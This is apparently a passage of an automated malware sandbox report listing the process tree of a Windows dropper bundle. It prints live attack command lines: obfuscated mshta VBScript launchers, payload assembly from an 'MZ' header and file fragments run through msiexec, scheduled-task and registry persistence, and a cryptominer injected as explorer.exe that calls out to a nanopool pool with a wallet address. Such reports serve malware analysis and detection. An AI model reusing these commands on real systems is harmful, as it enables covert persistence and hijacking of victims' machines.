C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
14⤵
PID:3020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
14⤵
PID:3256

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
14⤵
- Loads dropped DLL
PID:3372

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
11⤵
- Kills process with taskkill
PID:1552

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
8⤵
PID:5708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 608
9⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1104

C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe
"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"
8⤵
PID:1888

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
8⤵
- Loads dropped DLL
PID:1468

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
9⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5360

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
10⤵
- Loads dropped DLL
PID:8048

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e4,0x210,0x7ff87886dec0,0x7ff87886ded0,0x7ff87886dee0
11⤵
PID:6176

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff70b9e9e70,0x7ff70b9e9e80,0x7ff70b9e9e90
12⤵
PID:3872

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1716,3294298163946305644,4700786474681246703,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8048_1663557492" --mojo-platform-channel-handle=1732 /prefetch:8
11⤵
PID:5468

C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
8⤵
PID:6372

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6372 -s 2244
9⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3576

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
8⤵
PID:7052

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
9⤵
PID:5940

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
PID:3908

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
- Executes dropped EXE
PID:5700

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
11⤵
- Creates scheduled task(s)
PID:5304

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
PID:496

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
11⤵
PID:5708

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
12⤵
- Suspicious use of SetThreadContext
PID:2308

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
13⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6992

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
14⤵
PID:5024

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
13⤵
PID:5644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe
5⤵
PID:3352

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon1708beae021a5ff.exe
Mon1708beae021a5ff.exe
6⤵
- Executes dropped EXE
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone
5⤵
PID:1820

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bffc2992eb3d.exe
Mon17bffc2992eb3d.exe /mixone
6⤵
- Executes dropped EXE
PID:3160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17870faab0.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
2⤵
- Adds policy Run key to start application
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:1756

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\Pictures\Adobe Films\adF6KxjhcOfjYh4ost48IawU.exe"
3⤵
PID:7048

C:\Windows\SysWOW64\systray.exe
"C:\Windows\SysWOW64\systray.exe"
2⤵
PID:6848

C:\Users\Admin\AppData\Local\Temp\6F64.exe
C:\Users\Admin\AppData\Local\Temp\6F64.exe
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
PID:6776

C:\Users\Admin\AppData\Local\Temp\6F64.exe
C:\Users\Admin\AppData\Local\Temp\6F64.exe
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6704

C:\Users\Admin\AppData\Local\Temp\ABB3.exe
C:\Users\Admin\AppData\Local\Temp\ABB3.exe
2⤵
- Executes dropped EXE
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 276
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5052

C:\Users\Admin\AppData\Local\Temp\ED03.exe
C:\Users\Admin\AppData\Local\Temp\ED03.exe
2⤵
PID:3580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX4\mannishly.bat" "
3⤵
- Executes dropped EXE
PID:572

C:\Users\Admin\AppData\Local\Temp\RarSFX4\bifurcation.exe
bifurcation.exe -p"xicyqwllwklawixvurbiyphwsjuxiq"
4⤵
PID:6740

C:\Users\Admin\AppData\Local\Temp\RarSFX5\beadroll.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\beadroll.exe"
5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:5968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
6⤵
PID:5844

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
6⤵
PID:4264

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
6⤵
PID:6580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1944
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1320

C:\Users\Admin\AppData\Local\Temp\FFEF.exe
C:\Users\Admin\AppData\Local\Temp\FFEF.exe
2⤵
PID:6964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6964 -s 236
3⤵
- Program crash
- Checks processor information in registry
PID:500

C:\Users\Admin\AppData\Local\Temp\16A5.exe
C:\Users\Admin\AppData\Local\Temp\16A5.exe
2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2440

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:5912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 396
3⤵
- Program crash
- Checks processor information in registry
PID:3040

C:\Users\Admin\AppData\Local\Temp\2DA8.exe
C:\Users\Admin\AppData\Local\Temp\2DA8.exe
2⤵
PID:7084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 280
3⤵
- Program crash
- Enumerates system info in registry
PID:5244

C:\Users\Admin\AppData\Local\Temp\4112.exe
C:\Users\Admin\AppData\Local\Temp\4112.exe
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
PID:4964

C:\Users\Admin\AppData\Local\Temp\4112.exe
C:\Users\Admin\AppData\Local\Temp\4112.exe
3⤵
PID:3116

C:\Users\Admin\AppData\Local\Temp\5D56.exe
C:\Users\Admin\AppData\Local\Temp\5D56.exe
2⤵
- Suspicious use of SetThreadContext
PID:6784

C:\Users\Admin\AppData\Local\Temp\5D56.exe
C:\Users\Admin\AppData\Local\Temp\5D56.exe
3⤵
PID:4048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 208
4⤵
- Enumerates connected drives
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3580

C:\Users\Admin\AppData\Local\Temp\71F8.exe
C:\Users\Admin\AppData\Local\Temp\71F8.exe
2⤵
PID:6192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 280
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2372

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\7A55.dll
2⤵
PID:1336

C:\Users\Admin\AppData\Local\Temp\DF69.exe
C:\Users\Admin\AppData\Local\Temp\DF69.exe
2⤵
PID:4128

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"
3⤵
PID:6488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
4⤵
PID:7072

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
5⤵
PID:3992

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F
4⤵
- Creates scheduled task(s)
PID:3712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 1528
4⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9372

C:\Program Files (x86)\Ent5pjl6\configbdzhzl.exe
"C:\Program Files (x86)\Ent5pjl6\configbdzhzl.exe"
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3024

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\New Microsoft Word Document.docx" /o ""
2⤵
PID:6128

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\New Microsoft Word Document.docx" /o ""
2⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5380

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Desktop\New Microsoft PowerPoint Presentation.pptx" /ou ""
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:7032

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
2⤵
PID:5716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17870faab0.exe
Mon17870faab0.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1980
2⤵
- Program crash
PID:6800

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
1⤵
PID:5780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe" ) do taskkill -im "%~NxK" -F
2⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
3⤵
PID:5516

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
4⤵
PID:6508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
5⤵
PID:2236

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
4⤵
PID:5944

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
5⤵
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
6⤵
PID:6908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
6⤵
PID:4800

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\N3V4H8H.SXY
6⤵
- Loads dropped DLL
PID:7100

C:\Windows\SysWOW64\taskkill.exe
taskkill -im "9XMk2MZ_hrB_trxtCmDErnDv.exe" -F
3⤵
- Kills process with taskkill
PID:5700

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3592

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:1240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 452
3⤵
- Program crash
PID:6264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 452
3⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1240 -ip 1240
1⤵
PID:3236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 132 -p 4040 -ip 4040
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5880

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 5544 -ip 5544
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5672 -ip 5672
1⤵
PID:6776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5796 -ip 5796
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 932 -ip 932
1⤵
PID:6596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 3160 -ip 3160
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1460 -ip 1460
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2180

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 6372 -ip 6372
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2084

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4040

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5416

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4856 -s 456
3⤵
- Program crash
- Checks processor information in registry
PID:1092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4856 -ip 4856
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5592 -ip 5592
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5148 -ip 5148
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3412 -ip 3412
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 6032 -ip 6032
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 5708 -ip 5708
1⤵
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5688 -ip 5688
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 5788 -ip 5788
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 5828 -ip 5828
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 400 -ip 400
1⤵
PID:5772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5980 -ip 5980
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1816 -ip 1816
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5592 -ip 5592
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5656 -ip 5656
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4680 -ip 4680
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5784

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Loads dropped DLL
PID:5952

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6616

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:1180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 420
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 6552 -ip 6552
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
PID:7000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1180 -ip 1180
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2664 -ip 2664
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2440 -ip 2440
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 7084 -ip 7084
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5768 -ip 5768
1⤵
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5968 -ip 5968
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1484

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5496

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 236 -s 448
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 236 -ip 236
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6192 -ip 6192
1⤵
PID:6224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5012 -ip 5012
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6964 -ip 6964
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4048 -ip 4048
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2148

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6540

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 17AC13288A7D16CE214FD3E68B81D758 C
2⤵
- Loads dropped DLL
PID:2636

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding CC0EF3B12C0C1BEA05217AD842BA5455
2⤵
- Blocklisted process makes network request
PID:5824

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Kills process with taskkill
PID:6012

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B84794564B661AB9FB1D43794C5250D5 E Global\MSI0000
2⤵
- Drops file in Windows directory
PID:9732

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6024

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:6152

